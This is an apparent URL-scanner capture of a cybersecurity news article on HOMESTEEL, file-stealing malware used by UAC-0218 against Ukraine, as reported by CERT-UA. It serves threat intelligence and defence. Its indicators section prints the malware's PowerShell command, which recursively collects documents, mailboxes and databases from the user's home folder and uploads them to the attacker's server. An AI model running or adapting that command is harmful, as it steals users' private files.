thecyberexpress.com
2606:4700:20::681a:18a
Public Scan
URL:
https://thecyberexpress.com/homesteel-malware-emerges-in-ukraine/
Submission Tags: @nominet_threat_intel feedly-filtered-v1.0 reference_article_link confidence_null cluster_83328533 Search All
Submission: On October 26 via api from GB — Scanned from GB
Form analysis
8 forms found in the DOM
GET https://thecyberexpress.com/
<form action="https://thecyberexpress.com/" method="get" class="jeg_search_form" target="_top">
<input name="s" class="jeg_search_input" placeholder="Search..." type="text" value="" autocomplete="off">
<button aria-label="Search Button" type="submit" class="jeg_search_button btn"><i class="fa fa-search"></i></button>
</form>
GET https://thecyberexpress.com/
<form action="https://thecyberexpress.com/" method="get" class="jeg_search_form" target="_top">
<input name="s" class="jeg_search_input" placeholder="Search..." type="text" value="" autocomplete="off">
<button aria-label="Search Button" type="submit" class="jeg_search_button btn"><i class="fa fa-search"></i></button>
</form>
GET https://thecyberexpress.com/
<form action="https://thecyberexpress.com/" method="get" class="jeg_search_form" target="_top">
<input name="s" class="jeg_search_input" placeholder="Search..." type="text" value="" autocomplete="off">
<button aria-label="Search Button" type="submit" class="jeg_search_button btn"><i class="fa fa-search"></i></button>
</form>
GET https://thecyberexpress.com
<form action="https://thecyberexpress.com" method="get"><label class="screen-reader-text" for="cat">Categories</label><select name="cat" id="cat" class="postform">
<option value="-1">Select Category</option>
<option class="level-0" value="54">Appointments</option>
<option class="level-0" value="55">Budgets</option>
<option class="level-0" value="680">Bug Bounty & Rewards</option>
<option class="level-0" value="50">Business News</option>
<option class="level-0" value="44">Compliance</option>
<option class="level-0" value="42">Cyber Essentials</option>
<option class="level-0" value="1">Cyber News</option>
<option class="level-0" value="48">Cyber Warfare</option>
<option class="level-0" value="5677">Cybersecurity Awareness Month</option>
<option class="level-0" value="3089">Dark Web News</option>
<option class="level-0" value="41">Data Breach News</option>
<option class="level-0" value="3104">DDoS Attacks News</option>
<option class="level-0" value="6225">Deepfake</option>
<option class="level-0" value="49">Espionage</option>
<option class="level-0" value="47">Features</option>
<option class="level-0" value="39">Firewall Daily</option>
<option class="level-0" value="1599">Gitex2022</option>
<option class="level-0" value="45">Governance</option>
<option class="level-0" value="4159">Hacker Claims</option>
<option class="level-0" value="40">Hacker News</option>
<option class="level-0" value="7751">Hackers Interview</option>
<option class="level-0" value="2026">How to</option>
<option class="level-0" value="62">Interviews</option>
<option class="level-0" value="8932">Knowledge Hub</option>
<option class="level-0" value="57">Learning & Development</option>
<option class="level-0" value="3953">Lockbit Ransomware News</option>
<option class="level-0" value="265">Main Story</option>
<option class="level-0" value="3077">Malware News</option>
<option class="level-0" value="61">Market Reports</option>
<option class="level-0" value="52">Mergers & Aquisitions</option>
<option class="level-0" value="53">Partnerships</option>
<option class="level-0" value="63">Podcast</option>
<option class="level-0" value="46">Policy Updates</option>
<option class="level-0" value="1087">Press Release</option>
<option class="level-0" value="71">Ransomware News</option>
<option class="level-0" value="43">Regulations</option>
<option class="level-0" value="58">Research</option>
<option class="level-0" value="3094">Resources</option>
<option class="level-0" value="60">Sponsored Content</option>
<option class="level-0" value="51">Startups</option>
<option class="level-0" value="8381">Threat Actors</option>
<option class="level-0" value="4388">Threat Intelligence</option>
<option class="level-0" value="4376">Threat Intelligence News</option>
<option class="level-0" value="70">Vulnerabilities</option>
<option class="level-0" value="3079">Vulnerability News</option>
<option class="level-0" value="7637">What is</option>
<option class="level-0" value="59">Whitepapers</option>
<option class="level-0" value="56">Workforce</option>
</select>
</form>
POST #
<form action="#" data-type="login" method="post" accept-charset="utf-8">
<h3>Welcome Back!</h3>
<p>Login to your account below</p>
<!-- Form Messages -->
<div class="form-message"></div>
<p class="input_field">
<input type="text" name="username" placeholder="Username" value="">
</p>
<p class="input_field">
<input type="password" name="password" placeholder="Password" value="">
</p>
<p class="input_field remember_me">
<input type="checkbox" id="remember_me" name="remember_me" value="true">
<label for="remember_me">Remember Me</label>
</p>
<p class="submit">
<input type="hidden" name="action" value="login_handler">
<input type="hidden" name="jnews_nonce" value="96ada650a5">
<input type="submit" name="jeg_login_button" class="button" value="Log In" data-process="Processing . . ." data-string="Log In">
</p>
<div class="bottom_links clearfix">
<a href="#jeg_forgotform" class="jeg_popuplink forgot">Forgotten Password?</a>
</div>
</form>
POST #
<form action="#" data-type="forgot" method="post" accept-charset="utf-8">
<h3>Retrieve your password</h3>
<p>Please enter your username or email address to reset your password.</p>
<!-- Form Messages -->
<div class="form-message"></div>
<p class="input_field">
<input type="text" name="user_login" placeholder="Your email or username" value="">
</p>
<div class="g-recaptcha" data-sitekey=""></div>
<p class="submit">
<input type="hidden" name="action" value="forget_password_handler">
<input type="hidden" name="jnews_nonce" value="96ada650a5">
<input type="submit" name="jeg_login_button" class="button" value="Reset Password" data-process="Processing . . ." data-string="Reset Password">
</p>
<div class="bottom_links clearfix">
<a href="#jeg_loginform" class="jeg_popuplink"><i class="fa fa-lock"></i> Log In</a>
</div>
</form>
POST #
<form action="#" method="post" accept-charset="utf-8">
<h3>Add New Playlist</h3>
<!-- Form Messages -->
<div class="form-message"></div>
<div class="form-group">
<p class="input_field">
<input type="text" name="title" placeholder="Playlist Name" value="">
</p>
<p class="input_field">
<select name="visibility">
<option disabled="" selected="selected" value="">- Select Visibility -</option>
<option value="public">Public</option>
<option value="private">Private</option>
</select>
</p>
<!-- submit button -->
<div class="submit">
<input type="hidden" name="type" value="create_playlist">
<input type="hidden" name="action" value="playlist_handler">
<input type="hidden" name="post_id" value="">
<input type="hidden" name="jnews-playlist-nonce" value="560a272065">
<input type="submit" name="jeg_save_button" class="button" value="Save" data-process="Processing . . ." data-string="Save">
</div>
</div>
</form>
GET https://thecyberexpress.com/
<form action="https://thecyberexpress.com/" method="get" class="jeg_search_form" target="_top">
<input name="s" class="jeg_search_input" placeholder="Search..." type="text" value="" autocomplete="off">
<button aria-label="Search Button" type="submit" class="jeg_search_button btn"><i class="fa fa-search"></i></button>
</form>
Text Content
HOMESTEEL MALWARE EMERGES AS THE LATEST CYBERTHREAT TO UKRAINE’S DATA ASSETS

A SOPHISTICATED NEW MALWARE DUBBED HOMESTEEL FROM THE THREAT ACTOR UAC-0218 IS TARGETING CRITICAL UKRAINIAN DATA REPOSITORIES.

by Mihir Bagwe October 25, 2024 Reading Time: 4 mins read

A recent cyber campaign by the threat actor tracked as UAC-0218 has introduced a new malware variant called HOMESTEEL that targets critical Ukrainian data repositories. This latest offensive, flagged by Ukraine’s Computer Emergency Response Team (CERT-UA), reflects the modus operandi of Ukraine’s adversaries who aim to steal sensitive information from government and business networks.

CERT-UA identified the phishing methods, which include emails baiting recipients through familiar subject lines like “account” and “details” and linking to a seemingly legitimate “eDisk” platform. The eDisk link directs users to download RAR files that house malicious content, embedding two password-protected files labeled as “Contract20102024.doc” and “Invoice20102024.xlsx.” A concealed Visual Basic Script (VBS) file, “Password.vbe,” ultimately initiates HOMESTEEL’s data-siphoning operations.

The primary target files, such as those ending in “xls,” “xlsx,” “doc,” and “pdf,” are systematically collected from user directories up to five subfolders deep. HOMESTEEL’s code commands a recursive search, transmitting files under 10MB to an external server through an HTTP PUT request. This approach minimizes data size to evade potential detection while maximizing data collection.

HOMESTEEL’S PROXY USE ELEVATES ATTACK COMPLEXITY

UAC-0218’s techniques appear particularly well-tailored to the environment. HOMESTEEL can adapt to proxy settings on compromised systems, further camouflaging its network traffic. CERT-UA reported that each outgoing request to the attacker’s server contains the full path of the extracted file, which may assist attackers in cataloging sensitive files across compromised systems. This level of customization suggests a level of surveillance intelligence typically seen in more complex, persistent attacks.

A notable aspect of the HOMESTEEL malware lies in its reliance on PowerShell, a command-line shell in Windows environments widely exploited in cyber operations. CERT-UA researchers found an additional executable acting as a self-extracting archive with embedded PowerShell commands. These commands initiate further file reconnaissance, scanning user directories for extensions like xls*, doc*, pdf and eml, and dispatching files to a central server via HTTP POST requests. This double-methodology showcases HOMESTEEL’s resilience, as it attempts to bypass any security hurdles the initial infection vector encounters.

INFRASTRUCTURE TACTICS LINK CAMPAIGN TO AUGUST ORIGINS

The CERT-UA findings link UAC-0218’s activities back to August 2024, based on the domain registration data of its command infrastructure. Ukrainian cyber defenders on Wednesday revealed another campaign that began in August with a similar intent, but no links between the two could be established, as the threat actor in that case is tracked as UAC-0215.

The attackers leveraged HostZealot, a domain name registrar, and configured a custom Python-based web server as the central data-receiving platform. The server reveals a distinctive “Python Software Foundation BaseHTTP 0.6” banner, helping analysts attribute this campaign to the same infrastructure used in prior UAC-0218 attacks. By reusing components across multiple operations, UAC-0218 demonstrates a persistent strategy that leverages existing digital assets to increase efficiency and reduce overhead.

The HOMESTEEL campaign raises pressing concerns for Ukraine’s government, which has long battled cyber aggression. As cyber espionage campaigns against Ukraine continue to evolve, CERT-UA’s proactive monitoring of UAC-0218 indicates a critical awareness of threats that leverage evolving malware tactics and refined phishing methodologies.

INDICATORS OF COMPROMISE AS SHARED BY CERT-UA

Hosts:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
powershell.exe "(New-Object -ComObject Wscript.Shell).Popup('Error! OS Not Supported!')"
powershell.exe "[Net.ServicePointManager]::SecurityProtocol='Tls12';foreach($fil in dir $HOME -include('*.xls*','*doc*','*.pdf','*. eml','*.sqlite','*.pst','*.txt') -recurse | %{$_.FullName}){iwr https://staticgl.one/$fil -Method POST -infile $ file}"

MIHIR BAGWE
Bagwe has nearly half a decade of experience in reporting on the latest cybersecurity news and trends, and interviewing cybersecurity subject matter experts. He has previously worked with ISMG and CISO MAG, publications focussed on addressing the cybersecurity needs of the C-Suite, particularly the CISO and CIO communities.